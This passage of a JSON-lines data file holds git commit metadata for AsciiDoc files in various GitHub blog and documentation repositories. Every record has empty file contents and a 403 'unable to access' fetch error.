2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a63e5cf7d7701991729ff03da5f3bca61824439","subject":"Update 2016-03-22-Hello.adoc","message":"Update 2016-03-22-Hello.adoc","repos":"indusbox\/indusbox.github.io,indusbox\/indusbox.github.io,indusbox\/indusbox.github.io,indusbox\/indusbox.github.io","old_file":"_posts\/2016-03-22-Hello.adoc","new_file":"_posts\/2016-03-22-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/indusbox\/indusbox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"649d36abb61e49c5be178e7db48221a70514ce10","subject":"Update 2016-06-04-JSONP.adoc","message":"Update 2016-06-04-JSONP.adoc","repos":"YvonneZhang\/yvonnezhang.github.io","old_file":"_posts\/2016-06-04-JSONP.adoc","new_file":"_posts\/2016-06-04-JSONP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YvonneZhang\/yvonnezhang.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7ef94f9ee3d545bb740631b101d26dfe7e08fc0","subject":"Update 2017-02-01-About.adoc","message":"Update 2017-02-01-About.adoc","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2017-02-01-About.adoc","new_file":"_posts\/2017-02-01-About.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ricardozanini\/ricardozanini.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5dcf55d25bd82c8f014beaf7722d2ec17d743fd","subject":"fix #249 added ADR template (#251)","message":"fix #249 added ADR template (#251)\n\nthanx again Ralf...","repos":"aim42\/htmlSanityCheck,aim42\/htmlSanityCheck,aim42\/htmlSanityCheck","old_file":"src\/docs\/development\/template.adoc","new_file":"src\/docs\/development\/template.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aim42\/htmlSanityCheck.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"70eee7201921ab63bf2711ce0da4139afa03ea06","subject":"Update 2015-06-26-Asciinema-file-creator.adoc","message":"Update 2015-06-26-Asciinema-file-creator.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-06-26-Asciinema-file-creator.adoc","new_file":"_posts\/2015-06-26-Asciinema-file-creator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b21fef2f3a862ac3c05b09b5930c421db3d5d85","subject":"Update 2016-05-20-How-to-become-a-Master.adoc","message":"Update 2016-05-20-How-to-become-a-Master.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-05-20-How-to-become-a-Master.adoc","new_file":"_posts\/2016-05-20-How-to-become-a-Master.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da508567017a7e684f7af068e1890c929bd698d1","subject":"Update 2017-07-19-Wednesday-July-19-2017.adoc","message":"Update 2017-07-19-Wednesday-July-19-2017.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-19-Wednesday-July-19-2017.adoc","new_file":"_posts\/2017-07-19-Wednesday-July-19-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d533986f58b455f100fc88b6c9a2748940046447","subject":"Added a README.adoc","message":"Added a README.adoc\n","repos":"OpenHFT\/Chronicle-Wire,OpenHFT\/Chronicle-Wire","old_file":"src\/test\/java\/net\/openhft\/chronicle\/wire\/channel\/book\/README.adoc","new_file":"src\/test\/java\/net\/openhft\/chronicle\/wire\/channel\/book\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Wire.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a259c996d5eef0f7e9c93d8da33adf0d6b15b1a2","subject":"Update 2017-04-16-Kathiyawadi-Baingan-bhartha.adoc","message":"Update 2017-04-16-Kathiyawadi-Baingan-bhartha.adoc","repos":"birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io","old_file":"_posts\/2017-04-16-Kathiyawadi-Baingan-bhartha.adoc","new_file":"_posts\/2017-04-16-Kathiyawadi-Baingan-bhartha.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/birvajoshi\/birvajoshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a14762dd00a0522dff9014771b710e237a1011a7","subject":"Update 2018-06-09-Securing-Jenkins-Workspaces.adoc","message":"Update 2018-06-09-Securing-Jenkins-Workspaces.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2018-06-09-Securing-Jenkins-Workspaces.adoc","new_file":"_posts\/2018-06-09-Securing-Jenkins-Workspaces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"580b2c09401fe38e1ec075bdb204138f91e3690c","subject":"Update 2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","message":"Update 2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","new_file":"_posts\/2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b68b2c49731563b9a1d33c08b8f97399e073808","subject":"v1.93","message":"v1.93\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"release_notes.asciidoc","new_file":"release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b7bc97d1a9e686a919f55d6d1491bb277d327805","subject":"Update 2019-01-31.adoc","message":"Update 2019-01-31.adoc","repos":"qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io","old_file":"_posts\/2019-01-31.adoc","new_file":"_posts\/2019-01-31.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qu85101522\/qu85101522.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41dd691f6dc16b9809e792cf58fcce2dc8b5dec0","subject":"Update 2015-09-29-That-was-my-jam.adoc","message":"Update 2015-09-29-That-was-my-jam.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d08398e9e3bcfb7b393fef9b8d63c78ef398c11","subject":"Update 2013-12-06-OSX-Notes.adoc","message":"Update 2013-12-06-OSX-Notes.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"_posts\/2013-12-06-OSX-Notes.adoc","new_file":"_posts\/2013-12-06-OSX-Notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2e951de18516f5fb340ef1e55ca574f75f3a574","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Local design.adoc","new_file":"Best practices\/Local design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d43b88153655da926ade9d01ce2ed7c298c5470c","subject":"Update 2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","message":"Update 2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","new_file":"_posts\/2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97a993fe5294bbe415ff7ac01e727e0fcc06f3b8","subject":"Update 2015-10-08-pic-2.adoc","message":"Update 2015-10-08-pic-2.adoc","repos":"duarte-fonseca\/duarte-fonseca.github.io,duarte-fonseca\/duarte-fonseca.github.io,duarte-fonseca\/duarte-fonseca.github.io","old_file":"_posts\/2015-10-08-pic-2.adoc","new_file":"_posts\/2015-10-08-pic-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/duarte-fonseca\/duarte-fonseca.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7bc05f81c734d5e22b50cf4260622f958b2dd830","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fbeabb997088dc5e0a5becd9369e8f74ecbce53","subject":"Update 2017-08-11-Intro.adoc","message":"Update 2017-08-11-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-08-11-Intro.adoc","new_file":"_posts\/2017-08-11-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e71c00e0695b23cd1ee1957440d36301b561d5a1","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8e81518544e63559eefebd9558c04994971162f","subject":"First steps of guide of releasing under incubation","message":"First steps of guide of releasing under incubation\n","repos":"marc0der\/groovy-website,rahulsom\/sdkman-website,kevintanhongann\/groovy-website,sdkman\/sdkman-website,benignbala\/groovy-website,rahulsom\/sdkman-website,dmesu\/sdkman-website,marcoVermeulen\/groovy-website,groovy\/groovy-website,kevintanhongann\/groovy-website,webkaz\/groovy-website,marc0der\/groovy-website,webkaz\/groovy-website,benignbala\/groovy-website,dmesu\/sdkman-website,marcoVermeulen\/groovy-website,groovy\/groovy-website,sdkman\/sdkman-website","old_file":"site\/src\/site\/wiki\/incubation-release-process.adoc","new_file":"site\/src\/site\/wiki\/incubation-release-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rahulsom\/sdkman-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"457c3fe417acd7f553fc6a9f3bf983a65b6f276f","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c55ba4121dc8c190a7eb9f0aacab3315f394ddc2","subject":"Publish 2015-2-1-A-Man-Without-a-Country.adoc","message":"Publish 2015-2-1-A-Man-Without-a-Country.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"2015-2-1-A-Man-Without-a-Country.adoc","new_file":"2015-2-1-A-Man-Without-a-Country.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8c63b64137115fa32df79d27a0793c0b49552f8","subject":"Update 2017-03-13-Building-a-highly-available-Ansible-Tower-cluster.adoc","message":"Update 2017-03-13-Building-a-highly-available-Ansible-Tower-cluster.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-03-13-Building-a-highly-available-Ansible-Tower-cluster.adoc","new_file":"_posts\/2017-03-13-Building-a-highly-available-Ansible-Tower-cluster.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca9019706cbccd2af4906741c4044c49e04f7ac4","subject":"Update 2016-01-14-importxml.adoc","message":"Update 2016-01-14-importxml.adoc","repos":"danen-carlson\/blog,danen-carlson\/blog,danen-carlson\/blog","old_file":"_posts\/2016-01-14-importxml.adoc","new_file":"_posts\/2016-01-14-importxml.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danen-carlson\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37349fe99a92c5aee14848d01405b0f26b462b47","subject":"Update 2016-09-03-Try-num-2.adoc","message":"Update 2016-09-03-Try-num-2.adoc","repos":"bbsome\/bbsome.github.io,bbsome\/bbsome.github.io,bbsome\/bbsome.github.io,bbsome\/bbsome.github.io","old_file":"_posts\/2016-09-03-Try-num-2.adoc","new_file":"_posts\/2016-09-03-Try-num-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bbsome\/bbsome.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4f8a24e1a5dfa3fae5e4848b9d196b22b5c20cd","subject":"Update 2017-03-25-create-pc.adoc","message":"Update 2017-03-25-create-pc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-25-create-pc.adoc","new_file":"_posts\/2017-03-25-create-pc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e6c73353fcb89fa92fe9b96b328d091a89bd247","subject":"Renamed '_posts\/2017-08-15-How-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc' to '_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc'","message":"Renamed '_posts\/2017-08-15-How-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc' to '_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc'","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc","new_file":"_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ricardozanini\/ricardozanini.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31b48e291497f0242dca1ffda3ba42a6cdfe544b","subject":"Update 2015-08-17-Mono.adoc","message":"Update 2015-08-17-Mono.adoc","repos":"gsera\/gsera.github.io,gsera\/gsera.github.io,gsera\/gsera.github.io","old_file":"_posts\/2015-08-17-Mono.adoc","new_file":"_posts\/2015-08-17-Mono.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gsera\/gsera.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e645c2787368ee3e77adf7264498dedf9a318fe5","subject":"Remove note about truename and pathname","message":"Remove note about truename and pathname\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"3cd19feabc7e50525e38edd4c0d349bc42b55407","subject":"CL: better code format","message":"CL: better code format\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"2aed9cbfa18c1408c66a3b995ab6faa754f35a07","subject":"Update 2018-07-24-deadline.adoc","message":"Update 2018-07-24-deadline.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-07-24-deadline.adoc","new_file":"_posts\/2018-07-24-deadline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"672ffb22680fc6d8436ded42bb9aea1612e284c1","subject":"y2b create post iPhone 6 Bend Test + HTC One M8, Moto X, Others","message":"y2b create post iPhone 6 Bend Test + HTC One M8, Moto X, Others","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-09-24-iPhone-6-Bend-Test--HTC-One-M8-Moto-X-Others.adoc","new_file":"_posts\/2014-09-24-iPhone-6-Bend-Test--HTC-One-M8-Moto-X-Others.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33ad055ed938efdbc06b9f9d720d82fc213bd2d2","subject":"Publish Nov-11-2015-Hoka-One-One.adoc","message":"Publish Nov-11-2015-Hoka-One-One.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"Nov-11-2015-Hoka-One-One.adoc","new_file":"Nov-11-2015-Hoka-One-One.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5572584baef7d5c2144043d58f0460432fd1d134","subject":"Update 2015-09-10-Centos-7-on-VirtualBox-notes.adoc","message":"Update 2015-09-10-Centos-7-on-VirtualBox-notes.adoc","repos":"blater\/blater.github.io,blater\/blater.github.io,blater\/blater.github.io","old_file":"_posts\/2015-09-10-Centos-7-on-VirtualBox-notes.adoc","new_file":"_posts\/2015-09-10-Centos-7-on-VirtualBox-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blater\/blater.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"177f92119bcdfe37c07bc0f60d43cd29d845cace","subject":"y2b create post Galaxy S6 Active vs Slapshot!","message":"y2b create post Galaxy S6 Active vs Slapshot!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-30-Galaxy-S6-Active-vs-Slapshot.adoc","new_file":"_posts\/2015-11-30-Galaxy-S6-Active-vs-Slapshot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"264ddc1255769687094278310246ca81c127a014","subject":"Update 2016-04-08-A-quien-le-interese-Semana-2.adoc","message":"Update 2016-04-08-A-quien-le-interese-Semana-2.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-A-quien-le-interese-Semana-2.adoc","new_file":"_posts\/2016-04-08-A-quien-le-interese-Semana-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"013f5f5a887006a232949cf30ca25b085dcda8ef","subject":"Update 2016-10-02-Math-Week-4-Proof-Strategies.adoc","message":"Update 2016-10-02-Math-Week-4-Proof-Strategies.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-10-02-Math-Week-4-Proof-Strategies.adoc","new_file":"_posts\/2016-10-02-Math-Week-4-Proof-Strategies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74ef292b9e85611e531081c4588ac040f9fdb66f","subject":"Added yum\/apt adoc that was spun out of introduction.adoc.","message":"Added yum\/apt adoc that was spun out of introduction.adoc.\n","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-install\/src\/asciidoc\/text\/opennms\/repository.adoc","new_file":"opennms-doc\/guide-install\/src\/asciidoc\/text\/opennms\/repository.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aihua\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"73763805f20b3bfd6ef4edb251fc5f8fde4fea91","subject":"formatting for the literal text \"C++\"","message":"formatting for the literal text \"C++\"\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a7536fbc1b1bc5b75e8b8319d59a04d398b3fb30","subject":"Update 2018-12-17-second-perspective.adoc","message":"Update 2018-12-17-second-perspective.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-12-17-second-perspective.adoc","new_file":"_posts\/2018-12-17-second-perspective.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18e2c461fa9b3da5d5c10bd9e66f578785ebd8cc","subject":"Update 2014-04-23-Coder-module.adoc","message":"Update 2014-04-23-Coder-module.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-04-23-Coder-module.adoc","new_file":"_posts\/2014-04-23-Coder-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf4d4996e7c76cb750328c426245e99fea9cbf0b","subject":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b583a726837e07d97b71be3876247bb35a069d35","subject":"CL: string-ends-with","message":"CL: string-ends-with\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d0887134154f3b22f0b159187c2164e08da3e0a5","subject":"COMPILING: Python 3.x is now supported","message":"COMPILING: Python 3.x is now supported\n","repos":"CWolfRU\/freedoom,CWolfRU\/freedoom","old_file":"COMPILING.adoc","new_file":"COMPILING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CWolfRU\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"c9f520bc7049f57d5a6ee9cbb80b2622027fb620","subject":"Update 2016-01-04-Java-8.adoc","message":"Update 